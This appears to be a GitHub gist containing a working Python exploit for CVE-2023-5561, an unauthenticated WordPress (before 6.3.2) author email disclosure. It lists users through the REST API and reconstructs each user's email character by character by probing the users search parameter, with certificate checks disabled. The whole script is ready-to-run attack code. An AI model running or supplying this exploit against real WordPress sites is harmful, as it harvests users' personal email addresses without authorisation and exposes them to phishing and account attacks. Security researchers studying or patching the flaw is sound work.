@numanturle
Last active November 2, 2023 19:31
CVE-2023-5561
import requests
import string
import warnings
import json
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Silence the warning urllib3 raises for every request made with
# `verify=False` (certificate validation is off on all requests below).
warnings.simplefilter('ignore', InsecureRequestWarning)

# Every request in this script is routed through this address, so the
# script depends on an intercepting proxy listening on 127.0.0.1:8080.
_PROXY_ADDRESS = "127.0.0.1:8080"
proxy = {scheme: _PROXY_ADDRESS for scheme in ("http", "https")}
def init():
    """Parse the command line and hand the parsed options to exploit().

    A single option is defined: ``-u``/``--host`` (required), the URL
    prefix to which the REST endpoints are appended. argparse exits the
    process itself when the argument is missing.
    """
    cli = argparse.ArgumentParser(
        description='WP < 6.3.2 – Unauthenticated Post Author Email Disclosure CVE-2023-5561'
    )
    cli.add_argument('-u', '--host', help='Host', type=str, required=True)
    exploit(cli.parse_args())
def exploit(args):
    """Run the two-step disclosure against ``args.host`` and print results.

    Lists user slugs via the REST API, then recovers and prints each
    user's address with extract_email(). When the slug list is empty a
    single ``[-]`` line is printed instead; any other failure (network
    error, unexpected JSON) propagates from the helpers.
    """
    target = args.host
    slugs = extract_users(target)
    print("[+] Total users: " + str(len(slugs)))
    if not slugs:
        print("[-] No users found or rest api not enabled")
        return
    print("[+] Extracting emails...")
    for slug in slugs:
        # extract_email prints its own progress lines before returning.
        print("[+] " + slug + ": " + extract_email(target, slug))
def extract_users(host):
    """Return the ``slug`` of every entry listed at ``host``/wp-json/wp/v2/users.

    The body is decoded as ``utf-8-sig`` so a leading BOM does not break
    ``json.loads``. The response is assumed to be a JSON array of user
    objects: an error object or any non-list JSON makes the ``['slug']``
    lookup raise rather than return an empty list, so the caller's
    "No users found" message only covers an empty array. TLS verification
    is disabled and the request goes through the module-level ``proxy``.
    """
    response = requests.get(host + "/wp-json/wp/v2/users", verify=False, proxies=proxy)
    body = response.text.encode().decode('utf-8-sig')
    return [entry['slug'] for entry in json.loads(body)]
def extract_email(host, user):
    """Recover the email address of ``user`` one character at a time.

    Both stages probe ``host``/wp-json/wp/v2/users?search=<candidate> and
    accept a candidate when the body is not the empty array ``[]`` and
    contains ``user``. Stage 1 starts from "@" and appends characters
    (domain part); stage 2 prepends characters to that result (local
    part). The alphabet is lowercase letters, digits and "._-"; a
    character outside it ends the stage early, so the value returned may
    be only a partial address. Each accepted character costs up to one
    GET per alphabet symbol, all sent through ``proxy`` with TLS
    verification off, which makes a run a long series of ``?search=``
    requests from one client. Returns the last accepted candidate.
    """
    search_url = host + "/wp-json/wp/v2/users?search="
    alphabet = string.ascii_lowercase + string.digits + "._-"

    def fetch(candidate):
        # One probe; the BOM is stripped so the "[]" comparison is exact.
        r = requests.get(search_url + candidate, verify=False, proxies=proxy)
        return r.text.encode().decode('utf-8-sig')

    def grow(known, prepend):
        # Extend `known` by one symbol per pass; the for/else returns when
        # a full pass over the alphabet produced no hit for `user`.
        while True:
            for symbol in alphabet:
                candidate = symbol + known if prepend else known + symbol
                body = fetch(candidate)
                if body != "[]" and user in body:
                    known = candidate
                    break
            else:
                return known

    print("[+] User: " + user)
    print("[+] Stage 1 - Extracting email suffix...")
    suffix = grow("@", prepend=False)
    print("[+] User found: " + user + " - " + suffix + " - Extracting email...")
    print("[+] Stage 2 - Extracting email prefix...")
    return grow(suffix, prepend=True)
if __name__ == "__main__":
    # Script entry point: init() parses the CLI and starts the run.
    init()